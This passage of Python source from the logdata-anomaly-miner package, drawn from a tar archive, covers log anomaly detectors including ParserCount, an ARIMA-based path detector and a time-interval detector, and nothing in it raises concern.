reconstruction error with the min, max of ecm-loss loss = (loss - np.min(self.loss)) / (np.max(self.loss) - np.min(self.loss)) return loss def vector2array(self): """Extract only the values which were learned before from current self.event_count_vector and return an array.""" vector = [] for event in self.event_count_vector.values(): for key in self.feature_list: if key in event.keys(): vector.append(event[key]) return np.array(vector) def get_n_comp(self, eigen_values): """Return the number of components, which describe the variance threshold.""" # Calculate the explained variance on each of components variance_explained = [] for i in eigen_values[::-1]: variance_explained.append((i/sum(eigen_values))*100) # Calculate the cumulative explained variance (np.cumsum) cumulative_variance_explained = np.cumsum(variance_explained) for n, i in enumerate(cumulative_variance_explained): if i > (self.min_variance * 100): return n return None def repair_dict(self): """Check if any new values were added in current event_count_vector and repair self.event_count_matrix when necessary.""" for ecv in self.event_count_matrix: for key, value in self.event_count_vector.items(): if key not in ecv.keys(): for val in value: ecv[key] = {val: 0} if not self.event_count_vector[key].keys() == ecv[key].keys(): for k in self.event_count_vector[key].keys(): if k not in ecv[key].keys(): ecv[key][k] = 0 def reset_event_count_vector(self): """Reset event_count_vector by setting all count-values to 0.""" for events in self.event_count_vector.values(): for value in events: events[value] = 0 def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" PersistenceUtil.store_json(self.persistence_file_name, list(self.event_count_matrix)) def load_persistence_data(self): """Load the persistence data from storage.""" persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: self.event_count_matrix = list(persistence_data) self.compute_pca() # Copy feature list into event count vector and reset counts of each feature self.event_count_vector = copy.deepcopy(self.event_count_matrix[0]) self.reset_event_count_vector() else: if self.target_path_list is None or len(self.target_path_list) == 0: # Only one dimension when events are used instead of values; use empty string as placeholder self.event_count_vector = {"": {}} def allowlist_event(self, event_type, event_data, allowlisting_data): """Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = "Allowlisting data not understood by this detector" logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.constraint_list: self.constraint_list.append(event_data) return f"Allowlisted path {event_data} in {event_type}." def blocklist_event(self, event_type, event_data, blocklisting_data): """Blocklist an event generated by this source using the information emitted when generating the event. @return a message with information about blocklisting @throws Exception when blocklisting of this special event using given blocklisting_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) raise Exception(msg) if blocklisting_data is not None: msg = "Blocklisting data not understood by this detector" logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.ignore_list: self.ignore_list.append(event_data) return f"Blocklisted path {event_data} in {event_type}." def log_statistics(self, component_name): """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully in %d time windows in the last 60 minutes.", component_name, self.log_success, self.log_total, self.log_windows) elif STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully in %d time windows in the last 60 minutes.", component_name, self.log_success, self.log_total, self.log_windows) self.log_success = 0 self.log_total = 0 self.log_windows = 0 logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/ParserCount.py000066400000000000000000000160271500476301700336530ustar00rootroot00000000000000"""This component counts occurring combinations of values and periodically sends the results as a report. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import time import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.AnalysisChild import AnalysisContext from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface current_processed_lines_str = "CurrentProcessedLines" total_processed_lines_str = "TotalProcessedLines" class ParserCount(AtomHandlerInterface, TimeTriggeredComponentInterface): """This class creates a counter for path value combinations.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, report_interval=60, target_label_list=None, split_reports_flag=False, log_resource_ignore_list=None): """Initialize the ParserCount component. @param aminer_config configuration from analysis_context. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param report_interval delay in seconds before reporting. @param target_label_list a list of labels for the target_path_list. This list must have the same size as target_path_list. @param split_reports_flag if true every path produces an own report, otherwise one report for all paths is produced. """ # avoid "defined outside init" issue self.log_success, self.log_total = [None]*2 super().__init__( mutable_default_args=["target_path_list", "log_resource_ignore_list"], aminer_config=aminer_config, target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers, report_interval=report_interval, target_label_list=target_label_list, split_reports_flag=split_reports_flag, log_resource_ignore_list=log_resource_ignore_list ) self.count_dict = {} self.next_report_time = None if (self.target_path_list is None or self.target_path_list == []) and ( self.target_label_list is not None and self.target_label_list != []): msg = "Target labels cannot be used without specifying target paths." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if self.target_label_list is not None and len(self.target_path_list) != len(self.target_label_list): msg = "Every path must have a target label if target labels are used." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) for target_path in self.target_path_list: if self.target_label_list: target_path = self.target_label_list[self.target_path_list.index(target_path)] self.count_dict[target_path] = {current_processed_lines_str: 0, total_processed_lines_str: 0} def receive_atom(self, log_atom): """Receive a log atom from a source.""" for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return False self.log_total += 1 match_dict = log_atom.parser_match.get_match_dictionary() success_flag = False for target_path in self.target_path_list: match_element = match_dict.get(target_path) if match_element is not None: success_flag = True if self.target_label_list: target_path = self.target_label_list[self.target_path_list.index(target_path)] self.count_dict[target_path][current_processed_lines_str] += 1 self.count_dict[target_path][total_processed_lines_str] += 1 if not self.target_path_list: path = iter(match_dict).__next__() if path not in self.count_dict: self.count_dict[path] = {current_processed_lines_str: 0, total_processed_lines_str: 0} self.count_dict[path][current_processed_lines_str] += 1 self.count_dict[path][total_processed_lines_str] += 1 if self.next_report_time is None: self.next_report_time = time.time() + self.report_interval if success_flag: self.log_success += 1 return True def do_timer(self, trigger_time): """Check current ruleset should be persisted.""" if self.next_report_time is None: return self.report_interval delta = self.next_report_time - trigger_time if delta <= 0: self.send_report() delta = self.report_interval self.next_report_time = trigger_time + delta return delta def send_report(self): """Send a report to the event handlers.""" output_string = f"Parsed paths in the last {str(self.report_interval)} seconds:\n" t = time.time() if not self.split_reports_flag: for k in self.count_dict: c = self.count_dict[k] output_string += f"\t{str(k)}: {str(c)}\n" output_string = output_string[:-1] event_data = {"StatusInfo": self.count_dict, "FromTime": t - self.report_interval, "ToTime": t} for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "Count report", [output_string], event_data, None, self) else: for k in self.count_dict: output_string = f"Parsed paths in the last {str(self.report_interval)} seconds:\n" c = self.count_dict[k] output_string += f"\t{str(k)}: {str(c)}" status_info = {k: { current_processed_lines_str: c[current_processed_lines_str], total_processed_lines_str: c[total_processed_lines_str]}} event_data = {"StatusInfo": status_info, "FromTime": t - self.report_interval, "ToTime": t} for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "Count report", [output_string], event_data, None, self) for k in self.count_dict: self.count_dict[k][current_processed_lines_str] = 0 logging.getLogger(DEBUG_LOG_NAME).debug("%s sent report.", self.__class__.__name__) PathArimaDetector.py000066400000000000000000000663611500476301700346750ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module is a detector which uses a tsa-arima model to analyze the values of the paths in target_path_list. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import logging import numpy as np import statsmodels import statsmodels.api as sm import math from aminer import AminerConfig from aminer.AminerConfig import KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, DEBUG_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, \ DEFAULT_LOG_LINE_PREFIX from aminer.AnalysisChild import AnalysisContext from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.util import PersistenceUtil from scipy import stats, version binomial_test = None v = [int(x) for x in version.full_version.split(".")] if v[0] >= 1 and v[1] >= 7: binomial_test = stats.binomtest else: binomial_test = stats.binom_test class PathArimaDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, PersistableComponentInterface): """This class is used for an arima time series analysis of the values of the paths in target_path_list.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, event_type_detector, persistence_id="Default", target_path_list=None, output_logline=True, learn_mode=False, num_init=50, force_period_length=False, set_period_length=10, alpha=0.05, alpha_bt=0.05, num_results_bt=15, num_min_time_history=20, num_max_time_history=30, num_periods_tsa_ini=20, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param event_type_detector used to track the number of events in the time windows. @param persistence_id name of persistence file. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param learn_mode specifies whether new frequency measurements override ground truth frequencies. @param num_init number of lines processed before the period length is calculated. @param force_period_length states if the period length is calculated through the ACF, or if the period length is forced to be set to set_period_length. @param set_period_length states how long the period length is if force_period_length is set to True. @param alpha significance level of the estimated values. @param alpha_bt significance level for the bt test. @param num_results_bt number of results which are used in the binomial test. @param num_min_time_history number of lines processed before the period length is calculated. @param num_max_time_history maximum number of values of the time_history. @param num_periods_tsa_ini number of periods used to initialize the Arima-model. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__( mutable_default_args=["target_path_list", "log_resource_ignore_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, event_type_detector=event_type_detector, persistence_id=persistence_id, target_path_list=target_path_list, output_logline=output_logline, learn_mode=learn_mode, num_init=num_init, force_period_length=force_period_length, set_period_length=set_period_length, alpha=alpha, alpha_bt=alpha_bt, num_results_bt=num_results_bt, num_min_time_history=num_min_time_history, num_max_time_history=num_max_time_history, num_periods_tsa_ini=num_periods_tsa_ini, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list ) # Add the PathArimaDetector to the list of the modules, which use the event_type_detector. self.event_type_detector.add_following_modules(self) # Test if the ETD saves the values if not self.event_type_detector.save_values: msg = "ETD.save_values must be true to properly use the PathArimaDetector." logging.getLogger(DEBUG_LOG_NAME).warning(msg) raise ValueError(msg) # Test if the ETD saves enough values if self.event_type_detector.min_num_vals < self.num_periods_tsa_ini * int(self.num_init/2): msg = "ETD.min_num_vals must be greater than num_periods_tsa_ini * int(num_init/2)" logging.getLogger(DEBUG_LOG_NAME).warning(msg) raise ValueError(msg) # Test if the ETD saves enough values if self.event_type_detector.max_num_vals < self.num_periods_tsa_ini * int(self.num_init/2) + 500: msg = "ETD.max_num_vals must be greater than num_periods_tsa_ini * int(num_init/2) + 500" logging.getLogger(DEBUG_LOG_NAME).warning(msg) raise ValueError(msg) # List of the indices of the target_paths in the ETD self.target_path_index_list = [] # List of the period_lengths self.period_length_list = [] # List of the single arima_models (statsmodels) self.arima_models = [] # List of the observed values and the predictions of the TSAArima self.prediction_history = [] # List of the results if th value was in the limits of the one step predictions self.result_list = [] # Minimal number of successes for the binomial test in the last num_results_bt results self.bt_min_suc = self.bt_min_successes(self.num_results_bt, self.alpha, self.alpha_bt) # Loads the persistence self.persistence_file_name = AminerConfig.build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) self.load_persistence_data() def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" persistence_data = [self.target_path_index_list, self.period_length_list, self.prediction_history] PersistenceUtil.store_json(self.persistence_file_name, persistence_data) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def load_persistence_data(self): """Load the persistence data from storage.""" persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: self.target_path_index_list = persistence_data[0] self.period_length_list = persistence_data[1] self.prediction_history = persistence_data[2] def receive_atom(self, log_atom): """Receive a parsed atom and the information about the parser match. Tests if the event type includes paths of target_path_list and. analyzes their values with an TSA Arima model. @param log_atom the parsed log atom @return True if this handler was really able to handle and process the match. """ for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return False if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time event_index = self.event_type_detector.current_index if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False # Check if enough log lines have appeared to calculate the period length, initialize the arima model, or make a prediction if (len(self.period_length_list) <= event_index or self.period_length_list[event_index] is None) and\ len(self.event_type_detector.values[self.event_type_detector.current_index][0]) >= self.num_init: # Extend the list of the period_lengths and target_path_index if necessary if len(self.period_length_list) <= event_index: self.period_length_list += [None for _ in range(len(self.period_length_list), event_index + 2)] self.target_path_index_list += [None for _ in range(len(self.target_path_index_list), event_index + 2)] # Add all paths to the target_path_list if they are included in the ET and solely consist of floats self.target_path_index_list[event_index] = [] for target_path in self.target_path_list: if target_path in self.event_type_detector.variable_key_list[event_index]: var_index = self.event_type_detector.variable_key_list[event_index].index(target_path) if all(type(val) is float for val in self.event_type_detector.values[event_index][var_index]): self.target_path_index_list[event_index].append(var_index) # Calculate the period_length of the current event types values counts = [self.event_type_detector.values[event_index][var_index] for var_index in self.target_path_index_list[event_index]] self.calculate_period_length(event_index, counts, log_atom) # Try to initialize the arima model self.test_num_appearance(event_index, log_atom) elif len(self.period_length_list) > event_index and self.period_length_list[event_index] is not None: # Try to initialize or make a prediction with the arima model self.test_num_appearance(event_index, log_atom) return True def calculate_period_length(self, event_index, counts, log_atom): """Returns a list of the period length, if no period was found the value is set to -1.""" if self.force_period_length: # Check if the period length should be forced self.period_length_list[event_index] = [self.set_period_length for _ in counts] else: # Calculate the period lengths with the auto correlation function self.period_length_list[event_index] = [None for _ in counts] for target_path_index, data in enumerate(counts): if data is not None: # Apply the autocorrelation function to the data of the single target_paths. corr = list(map(abs, sm.tsa.acf(data, nlags=len(data), fft=True))) corr = np.array(corr) min_lag = -1 # Find the first local minimum for i in range(1, len(corr)-1): if corr[i] == min(corr[i-1: i+2]): min_lag = i break # Find the highest peak and set the time-step as the index + lag if min_lag != -1: highest_peak_index = np.argmax(corr[min_lag:]) self.period_length_list[event_index][target_path_index] = int(highest_peak_index + min_lag) # Print a message of the length of the time steps message = f"Calculated the periods for the event {self.event_type_detector.get_event_type(event_index)}: " \ f"{self.period_length_list[event_index]}" affected_path = self.event_type_detector.variable_key_list[event_index] self.print(message, log_atom, affected_path) def test_num_appearance(self, event_index, log_atom): """This function makes a one-step prediction and raises an alert if the count do not match the expected appearance.""" # Return, if not TSA should be calculated for this ET if self.period_length_list[event_index] and all(period is None for period in self.period_length_list[event_index]): return # Append the lists for the arima models if it is too short if len(self.arima_models) <= event_index: self.arima_models += [None for _ in range(event_index + 1 - len(self.arima_models))] self.result_list += [None for _ in range(event_index + 1 - len(self.result_list))] if len(self.prediction_history) <= event_index: self.prediction_history += [None for _ in range(event_index + 1 - len(self.prediction_history))] # Initialize the lists for the arima models for this ET if self.arima_models[event_index] is None: self.arima_models[event_index] = [None for _ in range(len(self.target_path_index_list[event_index]))] self.result_list[event_index] = [[] for _ in range(len(self.target_path_index_list[event_index]))] if self.prediction_history[event_index] is None: self.prediction_history[event_index] = [[[], [], []] for _ in range(len(self.target_path_index_list[event_index]))] # Check if the new values are floats if any(not self.event_type_detector.check_variables[event_index][var_index] or not isinstance(self.event_type_detector.values[event_index][var_index][-1], float) for var_index in self.target_path_index_list[event_index]): delete_indices = [count_index for count_index, var_index in enumerate(self.target_path_index_list[event_index]) if not self.event_type_detector.check_variables[event_index][var_index] or not isinstance(self.event_type_detector.values[event_index][var_index][-1], float)] delete_indices.sort(reverse=True) for count_index in delete_indices: # Remove the entries of the lists if len(self.target_path_index_list) > event_index and len(self.target_path_index_list[event_index]) > count_index: self.target_path_index_list[event_index] = self.target_path_index_list[event_index][:count_index] +\ self.target_path_index_list[event_index][count_index + 1:] if len(self.period_length_list) > event_index and len(self.period_length_list[event_index]) > count_index: self.period_length_list[event_index] = self.period_length_list[event_index][:count_index] +\ self.period_length_list[event_index][count_index + 1:] if len(self.arima_models) > event_index and len(self.arima_models[event_index]) > count_index: self.arima_models[event_index] = self.arima_models[event_index][:count_index] +\ self.arima_models[event_index][count_index + 1:] if len(self.prediction_history) > event_index and len(self.prediction_history[event_index]) > count_index: self.prediction_history[event_index] = self.prediction_history[event_index][:count_index] +\ self.prediction_history[event_index][count_index + 1:] if len(self.result_list) > event_index and len(self.result_list[event_index]) > count_index: self.result_list[event_index] = self.result_list[event_index][:count_index] +\ self.result_list[event_index][count_index + 1:] message = "Disabled the TSA for the target paths %s of event %s" % ( [self.event_type_detector.variable_key_list[event_index][count_index] for count_index in delete_indices], self.event_type_detector.get_event_type(event_index)) affected_path = [self.event_type_detector.variable_key_list[event_index][count_index] for count_index in delete_indices] self.print(message, log_atom, affected_path) # Initialize and update the arima_model if possible for count_index, var_index in enumerate(self.target_path_index_list[event_index]): # Initialize the arima_model if possible if self.learn_mode and self.arima_models[event_index][count_index] is None: if self.period_length_list[event_index][count_index] is not None: # Add the current value to the lists self.prediction_history[event_index][count_index][0].append(0) self.prediction_history[event_index][count_index][1].append(self.event_type_detector.values[event_index][var_index][-1]) self.prediction_history[event_index][count_index][2].append(0) # Check if enough values have been stored to initialize the arima_model if len(self.event_type_detector.values[event_index][var_index]) >= self.num_periods_tsa_ini *\ self.period_length_list[event_index][count_index]: message = f"Initializing the TSA for the event {self.event_type_detector.get_event_type(event_index)} and " \ f"targetpath {self.event_type_detector.variable_key_list[event_index][count_index]}" affected_path = self.event_type_detector.variable_key_list[event_index][count_index] self.print(message, log_atom, affected_path) # Add the arima_model to the list try: model = statsmodels.tsa.arima.model.ARIMA( self.event_type_detector.values[event_index][var_index][ -self.num_periods_tsa_ini * self.period_length_list[event_index][count_index]:], order=(self.period_length_list[event_index][count_index], 0, 0), seasonal_order=(0, 0, 0, self.period_length_list[event_index][count_index])) self.arima_models[event_index][count_index] = model.fit() except Exception: self.arima_models[event_index][count_index] = None if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) # Make a one-step prediction with the new values elif self.arima_models[event_index][count_index] is not None: count = self.event_type_detector.values[event_index][var_index][-1] # Add the prediction to the lists lower_limit, upper_limit = self.one_step_prediction(event_index, count_index) self.prediction_history[event_index][count_index][0].append(lower_limit) self.prediction_history[event_index][count_index][1].append(count) self.prediction_history[event_index][count_index][2].append(upper_limit) # Shorten the lists if necessary if len(self.prediction_history[event_index][count_index][0]) > self.num_max_time_history: self.prediction_history[event_index][count_index][0] = self.prediction_history[event_index][count_index][0][ -self.num_min_time_history:] self.prediction_history[event_index][count_index][1] = self.prediction_history[event_index][count_index][1][ -self.num_min_time_history:] self.prediction_history[event_index][count_index][2] = self.prediction_history[event_index][count_index][2][ -self.num_min_time_history:] else: # Test if count is in boundaries if count < lower_limit or count > upper_limit: message = f"Event: {self.event_type_detector.get_event_type(event_index)}, Path: " \ f"{self.event_type_detector.variable_key_list[event_index][var_index]}, Lower: {lower_limit}, Count: " \ f"{count}, Upper: {upper_limit}" affected_path = self.event_type_detector.variable_key_list[event_index][var_index] if count < lower_limit: confidence = (lower_limit - count) / (upper_limit - count) else: confidence = (count - upper_limit) / (count - lower_limit) self.print(message, log_atom, affected_path, confidence=confidence) self.result_list[event_index][count_index].append(0) else: self.result_list[event_index][count_index].append(1) # Reduce the number of entries in the time history if it gets too large if len(self.result_list[event_index][count_index]) >= 2 * max( self.num_results_bt, self.num_periods_tsa_ini * self.period_length_list[event_index][count_index]): self.result_list[event_index][count_index] = self.result_list[event_index][count_index][-max( self.num_results_bt, self.num_periods_tsa_ini * self.period_length_list[event_index][count_index]):] # Check if the too few or many successes are in the last section of the test history and discard the model # Else update the model for the next step if self.learn_mode and ( sum(self.result_list[event_index][count_index][-self.num_results_bt:]) + max(0, self.num_results_bt - len(self.result_list[event_index][count_index])) < self.bt_min_suc or binomial_test(sum(self.result_list[event_index][count_index][ -self.num_periods_tsa_ini * self.period_length_list[event_index][count_index]:]), n=self.num_periods_tsa_ini * self.period_length_list[event_index][count_index], p=(1-self.alpha), alternative="greater") < self.alpha_bt): message = f"Discard the TSA model for the event {self.event_type_detector.get_event_type(event_index)} and path " \ f"{self.event_type_detector.variable_key_list[event_index][var_index]}" affected_path = self.event_type_detector.variable_key_list[event_index][var_index] self.print(message, log_atom, affected_path) # Discard the trained model and reset the result_list self.arima_models[event_index][count_index] = None self.result_list[event_index][count_index] = [] if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) else: # Update the model self.arima_models[event_index][count_index] = self.arima_models[event_index][count_index].append([count]) def one_step_prediction(self, event_index, count_index): """Make a one-step prediction with the Arima model.""" prediction = self.arima_models[event_index][count_index].get_forecast(1) prediction = prediction.conf_int(alpha=self.alpha) # return to the order: lower_limit, upper_limit return prediction[0][0], prediction[0][1] @staticmethod def bt_min_successes(num_bt, p, alpha): """Calculate the minimal number of successes for the BT with significance alpha. p is the probability of success and num_bt is the number of observed tests. """ tmp_sum = 0.0 max_observations_factorial = math.factorial(num_bt) i_factorial = 1 for i in range(num_bt + 1): i_factorial = i_factorial * max(i, 1) tmp_sum = tmp_sum + max_observations_factorial / (i_factorial * math.factorial(num_bt - i)) * ((1 - p) ** i) * ( p ** (num_bt - i)) if tmp_sum > alpha: return i return num_bt def print(self, message, log_atom, affected_path, confidence=None): """Print the message.""" if isinstance(affected_path, str): affected_path = [affected_path] original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if original_log_line_prefix is None: original_log_line_prefix = "" if self.output_logline: sorted_log_lines = [original_log_line_prefix + log_atom.raw_data.decode()] analysis_component = {"AffectedLogAtomPaths": list(log_atom.parser_match.get_match_dictionary().keys())} else: sorted_log_lines = [log_atom.raw_data.decode()] analysis_component = {"AffectedLogAtomPaths": affected_path} event_data = {"AnalysisComponent": analysis_component, "TotalRecords": self.event_type_detector.total_records, "TypeInfo": {}} if self.event_type_detector.id_path_list: event_data["IDpaths"] = self.event_type_detector.id_path_list event_data["IDvalues"] = list(self.event_type_detector.id_path_list_tuples[self.event_type_detector.current_index]) if confidence is not None: event_data["TypeInfo"]["Confidence"] = confidence for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", message, sorted_log_lines, event_data, log_atom, self) PathValueTimeIntervalDetector.py000066400000000000000000000620501500476301700372330ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines a detector for time intervals of the appearance of log lines. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os import logging from aminer import AminerConfig from aminer.AminerConfig import DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, CONFIG_KEY_LOG_LINE_PREFIX, \ DEFAULT_LOG_LINE_PREFIX from aminer.AnalysisChild import AnalysisContext from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.util import PersistenceUtil class PathValueTimeIntervalDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, PersistableComponentInterface): """This class analyzes the time intervals of the appearance of log_atoms. The considered time intervals depend on the combination of values in the target_paths of target_path_list. """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, target_path_list, persistence_id="Default", allow_missing_values_flag=True, ignore_list=None, output_logline=True, learn_mode=False, time_period_length=86400, max_time_diff=360, num_reduce_time_list=10, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param persistence_id name of persistence file. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed. @param allow_missing_values_flag when set to True, the detector will also use matches, where one of the pathes from paths does not refer to an existing parsed data object. @param ignore_list list of paths that are not considered for correlation, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param learn_mode specifies whether new frequency measurements override ground truth frequencies. @param time_period_length length of the time window for which the appearances of log lines are identified with each other. Value of 86400 specifies a day and 604800 a week. @param max_time_diff maximal time difference in seconds for new times. If the difference of the new time to all previous times is greater than max_time_diff the new time is considered an anomaly. @param num_reduce_time_list number of new time entries appended to the time list, before the list is being reduced. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__( mutable_default_args=["ignore_list", "log_resource_ignore_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, persistence_id=persistence_id, target_path_list=target_path_list, allow_missing_values_flag=allow_missing_values_flag, ignore_list=ignore_list, output_logline=output_logline, learn_mode=learn_mode, time_period_length=time_period_length, max_time_diff=max_time_diff, num_reduce_time_list=num_reduce_time_list, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list ) if not self.target_path_list: msg = "target_path_list must not be empty or None." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) # Keys: Tuple of values of the paths of target_path_list, Entries: List of all appeared times to the tuple. self.appeared_time_list = {} # Keys: Tuple of values of the paths of target_path_list, Entries: Counter of appended times to the time list since last reduction. self.counter_reduce_time_intervals = {} # Loads the persistence self.persistence_id = persistence_id self.persistence_file_name = AminerConfig.build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) # Imports the persistence self.load_persistence_data() def receive_atom(self, log_atom): """Analyze if the time of the log_atom appeared in the time interval of a previously appeared times. The considered time intervals originate of events with the same combination of values in the target_paths of target_path_list. @param log_atom the parsed log atom @return True if this handler was really able to handle and process the match. """ for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return False if log_atom.atom_time is None: return False if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = 